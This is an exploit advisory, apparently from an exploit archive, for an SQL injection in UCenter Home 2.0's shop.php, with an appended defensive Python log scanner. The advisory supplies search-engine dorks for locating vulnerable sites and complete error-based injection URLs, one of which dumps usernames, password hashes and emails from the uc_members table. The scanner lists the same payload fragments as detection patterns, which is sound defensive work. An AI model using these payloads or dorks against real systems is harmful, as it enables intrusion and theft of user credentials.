__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

You use Hex conversion. And edit your SQL Injection Exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
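
A defensive check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access logs for shop.php requests whose shopid is not a plain integer and flags the fragments of the error-based payload. The combined log format, the sample log lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Fragments of the MySQL duplicate-key error technique used in the advisory's payload.
ERROR_BASED = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)",
    r"information_schema\s*\.",
    r"group\s+by",
    r"concat\s*\(",
)]
# Combined-log-format prefix (assumed): client, two ids, timestamp, request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_line(line):
    """Return (client, reason) for a shop.php request whose shopid is not a plain integer."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/shop.php"):
        return None
    # parse_qs percent-decodes the value, so encoded payloads are matched as sent.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue
        hits = sum(1 for p in ERROR_BASED if p.search(value))
        return client, "error-based SQLi pattern" if hits >= 3 else "non-numeric shopid"
    return None

def scan(lines):
    """Return the findings for every flagged line, in log order."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2011:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)'
    ' HTTP/1.1" 200 640',
    '198.51.100.9 - - [01/Jan/2011:10:00:12 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```

Because the payload is appended to a numeric shopid, enforcing an integer type on that parameter before it reaches the query rejects every request this check flags.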